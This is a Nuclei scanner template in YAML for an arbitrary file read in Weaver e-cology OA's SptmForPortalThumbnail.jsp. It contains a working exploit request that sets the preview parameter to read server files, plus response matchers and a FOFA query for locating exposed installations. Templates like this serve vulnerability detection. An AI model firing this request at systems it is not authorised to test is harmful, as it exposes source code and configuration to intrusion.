nuclei-templates/http/vulnerabilities/weaver/weaver-sptmforportalthumbna...

40 lines
1.1 KiB
YAML
Executable File

id: weaver-sptmforportalthumbnail-lfi
info:
name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.
reference:
- http://124.223.89.192/archives/e-cology8-14
- https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml
metadata:
verified: true
max-request: 1
fofa-query: app="泛微-E-Weaver"
tags: weaver,e-cology,oa,lfi
http:
- method: GET
path:
- "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "weaver.general.BaseBean"
- "getServletConfig"
condition: and
- type: word
part: header
words:
- "image/png"
- type: status
status:
- 200